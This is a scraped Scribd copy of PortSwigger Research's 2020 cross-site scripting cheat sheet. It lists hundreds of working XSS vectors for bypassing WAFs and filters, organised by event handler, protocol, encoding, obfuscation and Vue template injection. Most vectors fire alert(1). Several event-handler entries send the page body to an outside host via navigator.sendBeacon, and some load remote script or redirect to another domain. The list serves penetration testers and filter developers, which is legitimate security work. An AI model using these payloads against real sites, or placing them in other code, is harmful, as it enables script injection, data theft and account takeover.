Scribd
Upload
585 views

Cross-Site Scripting (XSS) Cheat Sheet 2020

This document summarizes a cross-site scripting (XSS) cheat sheet containing many vectors that can help bypass web application firewalls and filters. It includes proof of concepts for each vector organized by event, tag, or browser. The cheat sheet is regularly updated and maintained by PortSwigger Research.

Uploaded by

Sali Kerkishvili
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
585 views

Cross-Site Scripting (XSS) Cheat Sheet 2020

This document summarizes a cross-site scripting (XSS) cheat sheet containing many vectors that can help bypass web application firewalls and filters. It includes proof of concepts for each vector organized by event, tag, or browser. The cheat sheet is regularly updated and maintained by PortSwigger Research.

Uploaded by

Sali Kerkishvili
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 24

Cross-site scripting (XSS) cheat sheet

This cross-site scripting (XSS) cheat sheet contains many vectors that can help you bypass WAFs and filters. You can select vectors by the event, tag or
browser and a proof of concept is included for every vector.
This cheat sheet was brought to by PortSwigger Research. Follow us on twitter to recieve updates.
This cheat sheet is regularly updated in 2020. Last updated: Thu, 01 Oct 2020 14:46:40 +0000.

Table of contents

Event handlers

Event handlers that do not require user interaction


Event: Description: Code:

onactivate
Compatibility: Fires when the element is activated <xss id=x tabindex=1 onactivate=alert(1)></xss>

onafterprint
Compatibility: Fires after the page is printed <body onafterprint=alert(1)>

onafterscriptexecute
Compatibility: Fires after script is executed <xss onafterscriptexecute=alert(1)><script>1</script>

onanimationcancel
Compatibility: Fires when a CSS animation cancels <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target
{animation:10s ease-in-out 0s 1 x;}</style><xss id=x
style="position:absolute;" onanimationcancel="alert(1)"></xss>

onanimationend
Compatibility: Fires when a CSS animation ends <style>@keyframes x{}</style><xss style="animation-name:x"
onanimationend="alert(1)"></xss>

onanimationiteration
Compatibility: Fires when a CSS animation repeats <style>@keyframes slidein {}</style><xss style="animation-
duration:1s;animation-name:slidein;animation-iteration-count:2"
onanimationiteration="alert(1)"></xss>

onanimationstart
Compatibility: Fires when a CSS animation starts <style>@keyframes x{}</style><xss style="animation-name:x"
onanimationstart="alert(1)"></xss>

onbeforeactivate
Compatibility: Fires before the element is activated <xss id=x tabindex=1 onbeforeactivate=alert(1)></xss>

onbeforedeactivate
Compatibility: Fires before the element is deactivated <xss id=x tabindex=1 onbeforedeactivate=alert(1)></xss><input autofocus>

onbeforeprint
Compatibility: Fires before the page is printed <body onbeforeprint=alert(1)>

onbeforescriptexecute
Compatibility: Fires before script is executed <xss onbeforescriptexecute=alert(1)><script>1</script>
onbeforeunload
Compatibility: Fires after if the url changes <body onbeforeunload=navigator.sendBeacon('//https://ssl.portswigger-
labs.net/',document.body.innerHTML)>

onbegin
Compatibility: Fires when a svg animation begins <svg><animate onbegin=alert(1) attributeName=x dur=1s>

onblur
Compatibility: Fires when an element loses focus <a onblur=alert(1) tabindex=1 id=x></a><input autofocus>

onbounce
Compatibility: Fires when the marquee bounces <marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee>

oncanplay
Compatibility: Fires if the resource can be played <audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav">
</audio>

oncanplaythrough
Compatibility: Fires when enough data has been loaded <video oncanplaythrough=alert(1)><source src="validvideo.mp4"
type="video/mp4"></video>
to play the resource all the way through

oncuechange
Compatibility: Fires when subtitle changes <video controls><source src=validvideo.mp4 type=video/mp4><track default
oncuechange=alert(1) src="data:text/vtt,WEBVTT FILE 1 00:00:00.000 -->
00:00:05.000 <b>XSS</b> "></video>

ondeactivate
Compatibility: Fires when the element is deactivated <xss id=x tabindex=1 ondeactivate=alert(1)></xss><input id=y autofocus>

ondurationchange
Compatibility: Fires when duration changes <audio controls ondurationchange=alert(1)><source src=validaudio.mp3
type=audio/mpeg></audio>

onend
Compatibility: Fires when a svg animation ends <svg><animate onend=alert(1) attributeName=x dur=1s>

onended
Compatibility: Fires when the resource is finished <audio controls autoplay onended=alert(1)><source src="validaudio.wav"
type="audio/wav"></audio>
playing

onerror
Compatibility: Fires when the resource fails to load or <audio src/onerror=alert(1)>
causes an error

onfinish
Compatibility: Fires when the marquee finishes <marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>

onfocus
Compatibility: Fires when the element has focus <a id=x tabindex=1 onfocus=alert(1)></a>

onfocusin
Compatibility: Fires when the element has focus <a id=x tabindex=1 onfocusin=alert(1)></a>

onfocusout
Compatibility: Fires when an element loses focus <a onfocusout=alert(1) tabindex=1 id=x></a><input autofocus>

onhashchange
Compatibility: Fires if the hash changes <body onhashchange="alert(1)">

onload
Compatibility: Fires when the element is loaded <body onload=alert(1)>

onloadeddata
Compatibility: Fires when the first frame is loaded <audio onloadeddata=alert(1)><source src="validaudio.wav"
type="audio/wav"></audio>

onloadedmetadata
Compatibility: Fires when the meta data is loaded <audio autoplay onloadedmetadata=alert(1)> <source src="validaudio.wav"
type="audio/wav"></audio>

onloadend
Compatibility: Fires when the element finishes loading <image src=validimage.png onloadend=alert(1)>

onloadstart
Compatibility: Fires when the element begins to load <image src=validimage.png onloadstart=alert(1)>

onmessage
Compatibility: Fires when message event is received <body onmessage=alert(1)>
from a postMessage call

onpageshow
Compatibility: Fires when the page is shown <body onpageshow=alert(1)>

onplay
Compatibility: Fires when the resource is played <audio autoplay onplay=alert(1)><source src="validaudio.wav"
type="audio/wav"></audio>

onplaying
Compatibility: Fires the resource is playing <audio autoplay onplaying=alert(1)><source src="validaudio.wav"
type="audio/wav"></audio>

onpopstate
Compatibility: Fires when the history changes <body onpopstate=alert(1)>

onprogress
Compatibility: Fires when the video/audio begins <audio controls onprogress=alert(1)><source src=validaudio.mp3
type=audio/mpeg></audio>
downloading

onreadystatechange
Compatibility: Fires when the ready state changes <applet onreadystatechange=alert(1)></applet>

onrepeat
Compatibility: Fires when a svg animation repeats <svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />

onresize
Compatibility: Fires when the window is resized <body onresize="alert(1)">
onscroll
Compatibility: Fires when the page scrolls <body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>

onstart
Compatibility: Fires when the marquee starts <marquee onstart=alert(1)>XSS</marquee>

ontimeupdate
Compatibility: Fires when the timeline is changed <audio controls autoplay ontimeupdate=alert(1)><source
src="validaudio.wav" type="audio/wav"></audio>

ontoggle
Compatibility: Fires when the details tag is expanded <details ontoggle=alert(1) open>test</details>

ontransitioncancel
Compatibility: Fires when a CSS transition cancels <style>:target {color: red;}</style><xss id=x style="transition:color 10s"
ontransitioncancel=alert(1)></xss>

ontransitionend
Compatibility: Fires when a CSS transition ends <style>:target {color:red;}</style><xss id=x style="transition:color 1s"
ontransitionend=alert(1)></xss>

ontransitionrun
Compatibility: Fires when a CSS transition begins <style>:target {transform: rotate(180deg);}</style><xss id=x
style="transition:transform 2s" ontransitionrun=alert(1)></xss>

ontransitionstart
Compatibility: Fires when a CSS transition starts <style>:target {color:red;}</style><xss id=x style="transition:color 1s"
ontransitionstart=alert(1)></xss>

onunhandledrejection
Compatibility: Fires when a promise isn't handled <body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>

onunload
Compatibility: Fires when the page is unloaded <body onunload=navigator.sendBeacon('//https://ssl.portswigger-
labs.net/',document.body.innerHTML)>

onwaiting
Compatibility: Fires when while waiting for the data <video autoplay controls onwaiting=alert(1)><source src="validvideo.mp4"
type=video/mp4></video>

onwebkitanimationend
Compatibility: Fires when a CSS animation ends <style>@keyframes x{}</style><xss style="animation-name:x"
onwebkitanimationend="alert(1)"></xss>

onwebkitanimationiteration
Compatibility: Fires when a CSS animation repeats <style>@keyframes slidein {}</style><xss style="animation-
duration:1s;animation-name:slidein;animation-iteration-count:2"
onwebkitanimationiteration="alert(1)"></xss>

onwebkitanimationstart
Compatibility: Fires when a CSS animation starts <style>@keyframes x{}</style><xss style="animation-name:x"
onwebkitanimationstart="alert(1)"></xss>

onwebkittransitionend
Compatibility: Fires when a CSS transition ends <style>:target {color:red;}</style><xss id=x style="transition:color 1s"
onwebkittransitionend=alert(1)></xss>

Event handlers that do require user interaction


Event: Description: Code:
onauxclick
Compatibility: Fires when right clicking or using the <input onauxclick=alert(1)>
middle button of the mouse

onbeforecopy
Compatibility: Requires you copy a piece of text <a onbeforecopy="alert(1)" contenteditable>test</a>

onbeforecut
Compatibility: Requires you cut a piece of text <a onbeforecut="alert(1)" contenteditable>test</a>

onbeforepaste
Compatibility: Requires you paste a piece of text <a onbeforepaste="alert(1)" contenteditable>test</a>

onchange
Compatibility: Requires as change of value <input onchange=alert(1) value=xss>

onclick
Compatibility: Requires a click of the element <xss onclick="alert(1)">test</xss>

onclose
Compatibility: Fires when a dialog is closed <dialog open onclose=alert(1)><form method=dialog><button>XSS</button>
</form>

oncontextmenu
Compatibility: Triggered when right clicking to show the <xss oncontextmenu="alert(1)">test</xss>
context menu

oncopy
Compatibility: Requires you copy a piece of text <xss oncopy=alert(1) value="XSS" autofocus tabindex=1>test

oncut
Compatibility: Requires you cut a piece of text <xss oncut=alert(1) value="XSS" autofocus tabindex=1>test

ondblclick
Compatibility: Triggered when double clicking the <xss ondblclick="alert(1)" autofocus tabindex=1>test</xss>
element

ondrag
Compatibility: Triggered dragging the element <xss draggable="true" ondrag="alert(1)">test</xss>

ondragend
Compatibility: Triggered dragging is finished on the <xss draggable="true" ondragend="alert(1)">test</xss>
element

ondragenter
Compatibility: Requires a mouse drag <xss draggable="true" ondragenter="alert(1)">test</xss>

ondragleave
Compatibility: Requires a mouse drag <xss draggable="true" ondragleave="alert(1)">test</xss>

ondragover
Compatibility: <div draggable="true" contenteditable>drag me</div><xss
Compatibility: <div draggable= true contenteditable>drag me</div><xss
Triggered dragging over an element ondragover=alert(1) contenteditable>drop here</xss>

ondragstart
Compatibility: Requires a mouse drag <xss draggable="true" ondragstart="alert(1)">test</xss>

ondrop
Compatibility: Triggered dropping a draggable element <div draggable="true" contenteditable>drag me</div><xss ondrop=alert(1)
contenteditable>drop here</xss>

onfullscreenchange
Compatibility: Fires when a video changes full screen <video onfullscreenchange=alert(1) src=validvideo.mp4 controls>
status

oninput
Compatibility: Requires as change of value <input oninput=alert(1) value=xss>

oninvalid
Compatibility: Requires a form submission with an <form><input oninvalid=alert(1) required><input type=submit>
element that does not satisfy its
constraints such as a required attribute.

onkeydown
Compatibility: Triggered when a key is pressed <xss onkeydown="alert(1)" contenteditable>test</xss>

onkeypress
Compatibility: Triggered when a key is pressed <xss onkeypress="alert(1)" contenteditable>test</xss>

onkeyup
Compatibility: Triggered when a key is released <xss onkeyup="alert(1)" contenteditable>test</xss>

onmousedown
Compatibility: Triggered when the mouse is pressed <xss onmousedown="alert(1)">test</xss>

onmouseenter
Compatibility: Triggered when the mouse is hovered <xss onmouseenter="alert(1)">test</xss>
over the element

onmouseleave
Compatibility: Triggered when the mouse is moved <xss onmouseleave="alert(1)">test</xss>
away from the element

onmousemove
Compatibility: Requires mouse movement <xss onmousemove="alert(1)">test</xss>

onmouseout
Compatibility: Triggered when the mouse is moved <xss onmouseout="alert(1)">test</xss>
away from the element

onmouseover
Compatibility: Requires a hover over the element <xss onmouseover="alert(1)">test</xss>

onmouseup
Compatibility: Triggered when the mouse button is <xss onmouseup="alert(1)">test</xss>
released
onmousewheel
Compatibility: Fires when the mousewheel scrolls <xss onmousewheel=alert(1)>requires scrolling

onmozfullscreenchange
Compatibility: Fires when a video changes full screen <video onmozfullscreenchange=alert(1) src=validvideo.mp4 controls>
status

onpagehide
Compatibility: Fires when the page is changed <body onpagehide=navigator.sendBeacon('//https://ssl.portswigger-
labs.net/',document.body.innerHTML)>

onpaste
Compatibility: Requires you paste a piece of text <a onpaste="alert(1)" contenteditable>test</a>

onpause
Compatibility: Requires clicking the element to pause <audio autoplay controls onpause=alert(1)><source src="validaudio.wav"
type="audio/wav"></audio>

onpointerdown
Compatibility: Fires when the mouse down <xss onpointerdown=alert(1)>XSS</xss>

onpointerenter
Compatibility: Fires when the mouseenter <xss onpointerenter=alert(1)>XSS</xss>

onpointerleave
Compatibility: Fires when the mouseleave <xss onpointerleave=alert(1)>XSS</xss>

onpointermove
Compatibility: Fires when the mouse move <xss onpointermove=alert(1)>XSS</xss>

onpointerout
Compatibility: Fires when the mouse out <xss onpointerout=alert(1)>XSS</xss>

onpointerover
Compatibility: Fires when the mouseover <xss onpointerover=alert(1)>XSS</xss>

onpointerrawupdate
Compatibility: Fires when the pointer changes <xss onpointerrawupdate=alert(1)>XSS</xss>

onpointerup
Compatibility: Fires when the mouse up <xss onpointerup=alert(1)>XSS</xss>

onreset
Compatibility: Requires a click <form onreset=alert(1)><input type=reset>

onsearch
Compatibility: Fires when a form is submitted and the <form><input type=search onsearch=alert(1) value="Hit return" autofocus>
input has a type attribute of search

onseeked
Compatibility: Requires clicking the element timeline <audio autoplay controls onseeked=alert(1)><source src="validaudio.wav"
type="audio/wav"></audio>
onseeking
Compatibility: Requires clicking the element timeline <audio autoplay controls onseeking=alert(1)><source src="validaudio.wav"
type="audio/wav"></audio>

onselect
Compatibility: Requires you select text <input onselect=alert(1) value="XSS" autofocus>

onselectionchange
Compatibility: Fires when text selection is changed on <body onselectionchange=alert(1)>select some text
the page

onselectstart
Compatibility: Fires when beginning a text selection <body onselectstart=alert(1)>select some text

onshow
Compatibility: Fires context menu is shown <div contextmenu=xss><p>Right click<menu type=context id=xss
onshow=alert(1)></menu></div>

onsubmit
Compatibility: Requires a form submission <form onsubmit=alert(1)><input type=submit>

ontouchend
Compatibility: Fires when the touch screen, only mobile <body ontouchend=alert(1)>
device

ontouchmove
Compatibility: Fires when the touch screen and move, <body ontouchmove=alert(1)>
only mobile device

ontouchstart
Compatibility: Fires when the touch screen, only mobile <body ontouchstart=alert(1)>
device

onvolumechange
Compatibility: Requires volume adjustment <audio autoplay controls onvolumechange=alert(1)><source
src="validaudio.wav" type="audio/wav"></audio>

onwheel
Compatibility: Fires when you use the mouse wheel <body onwheel=alert(1)>

Restricted characters

No parentheses using exception handling <script>onerror=alert;throw 1</script>

No parentheses using exception handling no semi <script>{onerror=alert}throw 1</script>


colons

No parentheses using exception handling no semi <script>throw onerror=alert,1</script>


colons using expressions

No parentheses using exception handling and eval <script>throw onerror=eval,'=alert\x281\x29'</script>

No parentheses using exception handling and eval <script>


{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x
on Firefox
281\x29'}</script>
No parentheses using ES6 hasInstance and <script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>

instanceof with eval

No parentheses using ES6 hasInstance and <script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>


instanceof with eval without .

No parentheses using location redirect <script>location='javascript:alert\x281\x29'</script>

No parentheses using location redirect no strings <script>location=name</script>

No parentheses using template strings <script>alert`1`</script>

No parentheses using template strings and location <script>new Function`X${document.location.hash.substr`1`}`</script>


hash

No parentheses or spaces, using template strings <script>Function`X${document.location.hash.substr`1`}```</script>


and location hash

Frameworks

Bootstrap onanimationstart event <xss class=progress-bar-animated onanimationstart=alert(1)>

Bootstrap ontransitionend event <xss class="carousel slide" data-ride=carousel data-interval=100


ontransitionend=alert(1)><xss class=carousel-inner><xss class="carousel-
item active"></xss><xss class=carousel-item></xss></xss></xss>

Protocols

Iframe src attribute JavaScript protocol <iframe src="javascript:alert(1)">

Object data attribute with JavaScript protocol <object data="javascript:alert(1)">

Embed src attribute with JavaScript protocol <embed src="javascript:alert(1)">

A standard JavaScript protocol <a href="javascript:alert(1)">XSS</a>

The protocol is not case sensitive <a href="JaVaScript:alert(1)">XSS</a>

Characters \x01-\x20 are allowed before the protocol <a href=" javascript:alert(1)">XSS</a>

Characters \x09,\x0a,\x0d are allowed inside the <a href="javas cript:alert(1)">XSS</a>


protocol

Characters \x09,\x0a,\x0d are allowed after protocol <a href="javascript :alert(1)">XSS</a>


name before the colon

Xlink namespace inside SVG with JavaScript <svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>
protocol

SVG animate tag using values <svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1)


/><a id=xss><text x=20 y=20>XSS</text></a>

SVG animate tag using to <svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1)


to=1 /><a id=xss><text x=20 y=20>XSS</text></a>

SVG set tag <svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1)


/><a id=xss><text x=20 y=20>XSS</text></a>
Data protocol inside script src <script src="data:text/javascript,alert(1)"></script>

SVG script href attribute without closing script tag <svg><script href="data:text/javascript,alert(1)" />

SVG use element Chrome/Firefox <svg><use href="data:image/svg+xml,<svg id='x'


xmlns='http://www.w3.org/2000/svg'
xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a
xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100'
/></a></svg>#x"></use></svg>

Import statement with data URL <script>import('data:text/javascript,alert(1)')</script>

Base tag with JavaScript protocol rewriting relative <base href="javascript:/a/-alert(1)///////"><a


href=../lol/safari.html>test</a>
URLS

MathML makes any tag clickable <math><x href="javascript:alert(1)">blah

Button and formaction <form><button formaction=javascript:alert(1)>XSS

Input and formaction <form><input type=submit formaction=javascript:alert(1) value=XSS>

Form and action <form action=javascript:alert(1)><input type=submit value=XSS>

Use element with an external URL <svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x"


/></svg>

Animate tag with keytimes and multiple values <svg><animate xlink:href=#xss attributeName=href dur=5s
repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?
&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text>
</a>

Other useful attributes

Using srcdoc attribute <iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>

Using srcdoc with entities <iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>

Click a submit element from anywhere on the page, <form action="javascript:alert(1)"><input type=submit id=x></form><label
for=x>XSS</label>
even outside the form

Hidden inputs: Access key attributes can enable <input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X
on Windows) (CTRL+ALT+X on OS X)
XSS on normally unexploitable elements

Link elements: Access key attributes can enable <link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press
ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
XSS on normally unexploitable elements

Download attribute can save a copy of the current <a href=# download="filename.html">Test</a>
webpage

Disable referrer using referrerpolicy <img referrerpolicy="no-referrer" src="//portswigger-labs.net">

Set window.name via parameter on the window.open <a href=# onclick="window.open('http://subdomain1.portswigger-


labs.net/xss/xss.php?
function
context=js_string_single&x=%27;eval(name)//','alert(1)')">XSS</a>

Set window.name via name attribute in a <iframe> <iframe name="alert(1)" src="https://portswigger-labs.net/xss/xss.php?


context=js_string_single&x=%27;eval(name)//"></iframe>
tag

Set window.name via target attribute in a <base> tag <base target="alert(1)"><a href="http://subdomain1.portswigger-
labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via
target in base tag</a>
ta get base tag /a

Set window.name via target attribute in a <a> tag <a target="alert(1)" href="http://subdomain1.portswigger-
labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via
target in a tag</a>

Set window.name via usemap attribute in a <img> <img src="validimage.png" width="10" height="10" usemap="#xss"><map
name="xss"><area shape="rect" coords="0,0,82,126" target="alert(1)"
tag
href="http://subdomain1.portswigger-labs.net/xss/xss.php?
context=js_string_single&x=%27;eval(name)//"></map>

Set window.name via target attribute in a <form> tag <form action="http://subdomain1.portswigger-labs.net/xss/xss.php"


target="alert(1)"><input type=hidden name=x value="';eval(name)//"><input
type=hidden name=context value=js_string_single><input type="submit"
value="XSS via target in a form"></form>

Set window.name via formtarget attribute in a <form><input type=hidden name=x value="';eval(name)//"><input type=hidden
name=context value=js_string_single><input type="submit"
<input> tag type submit
formaction="http://subdomain1.portswigger-labs.net/xss/xss.php"
formtarget="alert(1)" value="XSS via formtarget in input type submit">
</form>

Set window.name via formtarget attribute in a <form><input type=hidden name=x value="';eval(name)//"><input type=hidden
name=context value=js_string_single><input name=1 type="image"
<input> tag type image
src="validimage.png" formaction="http://subdomain1.portswigger-
labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in
input type image"></form>

Special tags

Redirect to a different domain <meta http-equiv="refresh" content="0; url=//portswigger-labs.net">

Meta charset attribute UTF-7 <meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Meta charset UTF-7 <meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-


script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (Has to be at the start of the +/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-


document) 1

UTF-7 BOM characters (Has to be at the start of the +/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-


document) 2

UTF-7 BOM characters (Has to be at the start of the +/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-


document) 3

UTF-7 BOM characters (Has to be at the start of the +/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-


document) 4

Upgrade insecure requests <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-


requests">

Disable JavaScript via iframe sandbox <iframe sandbox src="//portswigger-labs.net"></iframe>

Disable referer <meta name="referrer" content="no-referrer">

Encoding

Overlong UTF-8 %C0%BCscript>alert(1)</script> %E0%80%BCscript>alert(1)</script>


%F0%80%80%BCscript>alert(1)</script> %F8%80%80%80%BCscript>alert(1)
</script> %FC%80%80%80%80%BCscript>alert(1)</script>

Unicode escapes <script>\u0061lert(1)</script>

Unicode escapes ES6 style <script>\u{61}lert(1)</script>


Unicode escapes ES6 style zero padded <script>\u{0000000061}lert(1)</script>

Hex encoding JavaScript escapes <script>eval('\x61lert(1)')</script>

Octal encoding <script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script>


<script>eval('alert(\61)')</script>

Decimal encoding with optional semi-colon <a href="&#106;avascript:alert(1)">XSS</a><a


href="&#106avascript:alert(1)">XSS</a>

SVG script with HTML encoding <svg><script>&#97;lert(1)</script></svg> <svg><script>&#x61;lert(1)


</script></svg> <svg><script>alert&NewLine;(1)</script></svg> <svg>
<script>x="&quot;,alert(1)//";</script></svg>

Decimal encoding with padded zeros <a href="&#0000106avascript:alert(1)">XSS</a>

Hex encoding entities <a href="&#x6a;avascript:alert(1)">XSS</a>

Hex encoding without semi-colon provided next <a href="j&#x61vascript:alert(1)">XSS</a> <a href="&#x6a
avascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a>
character is not a-f0-9

Hex encoding with padded zeros <a href="&#x0000006a;avascript:alert(1)">XSS</a>

Hex encoding is not case sensitive <a href="&#X6A;avascript:alert(1)">XSS</a>

HTML entities <a href="javascript&colon;alert(1)">XSS</a> <a


href="java&Tab;script:alert(1)">XSS</a> <a
href="java&NewLine;script:alert(1)">XSS</a> <a
href="javascript&colon;alert&lpar;1&rpar;">XSS</a>

URL encoding <a href="javascript:x='%27-alert(1)-%27';">XSS</a>

HTML entities and URL encoding <a href="javascript:x='&percnt;27-alert(1)-%27';">XSS</a>

Obfuscation

Data protocol inside script src with base64 <script src=data:text/javascript;base64,YWxlcnQoMSk=></script>

Data protocol inside script src with base64 and <script


src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&
HTML entities
#x6f;&#x4d;&#x53;&#x6b;&#x3d;></script>

Data protocol inside script src with base64 and URL <script
src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d>
encoding
</script>

Iframe srcdoc HTML encoded <iframe srcdoc=&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;>


</iframe>

Iframe JavaScript URL with HTML and URL encoding <iframe


src="javascript:'&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x2
5;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&
#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x4
5;'"></iframe>

SVG script with unicode escapes and HTML <svg>


<script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&
encoding
#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x3
2;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>

Client-side template injection


VueJS reflected
Version: Author: Length: Vector:

Version 2 Mario Heiderich (Cure53) 41 {{constructor.constructor('alert(1)')()}}

Version 2 Mario Heiderich (Cure53) & 62 <div v-html="''.constructor.constructor('alert(1)')()">a</div>


Sebastian Lekies (Google) &
Eduardo Vela Nava (Google)
& Krzysztof Kotowicz
(Google)

Version 2 Gareth Heyes (PortSwigger) 39 <x v-html=_c.constructor('alert(1)')()>

Version 2 Peter af Geijerstam (Swedish 37 <x v-if=_c.constructor('alert(1)')()>


Shellcode Factory)

Version 2 Gareth Heyes (PortSwigger) & 32 {{_c.constructor('alert(1)')()}}


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 32 {{_v.constructor('alert(1)')()}}


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 32 {{_s.constructor('alert(1)')()}}


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 39 <p v-show="_c.constructor`alert(1)`()">


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 52 <x v-on:click='_b.constructor`alert(1)`()'>click</x>


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 41 <x v-bind:a='_b.constructor`alert(1)`()'>


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 33 <x @[_b.constructor`alert(1)`()]>


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 33 <x :[_b.constructor`alert(1)`()]>


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 33 <p v-=_c.constructor`alert(1)`()>


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 33 <x #[_c.constructor`alert(1)`()]>


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 32 <p :=_c.constructor`alert(1)`()>


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 32 {{_c.constructor('alert(1)')()}}


Lewis Ardern & PwnFunction
(Independent consultant)
Version 2 Gareth Heyes (PortSwigger) & 30 {{_b.constructor`alert(1)`()}}
Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 40 <x v-bind:is="'script'" src="//14.rs" />


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 27 <x is=script src=//⑭.₨>


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 48 <x @click='_b.constructor`alert(1)`()'>click</x>


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 33 <x @[_b.constructor`alert(1)`()]>


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 33 <x :[_b.constructor`alert(1)`()]>


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 33 <x #[_c.constructor`alert(1)`()]>


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 52 <x title"="&lt;iframe&Tab;onload&Tab;=alert(1)&gt;">


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 73 <x


title"="&lt;iframe&Tab;onload&Tab;=setTimeout(/alert(1)/.source)&gt;">
Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 31 <xyz<img/src onerror=alert(1)>>


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 116 <svg><svg><b>


<noscript>&lt;/noscript&gt;&lt;iframe&Tab;onload=setTimeout(/alert(1)/
Lewis Ardern & PwnFunction
.source)&gt;</noscript></b></svg>
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 59 <a @['c\lic\u{6b}']="_c.constructor('alert(1)')()">test</a>


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 42 {{$el.ownerDocument.defaultView.alert(1)}}


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 56 {{$el.innerHTML='\u003cimg src onerror=alert(1)\u003e'}}


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 45 <img src @error=e=$event.path.pop().alert(1)>


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 55 <img src @error=e=$event.composedPath().pop().alert(1)>


Lewis Ardern & PwnFunction
(Independent consultant)

Version 2 Gareth Heyes (PortSwigger) & 30 <img src @error=this.alert(1)>


Lewis Ardern & PwnFunction
(Independent consultant)
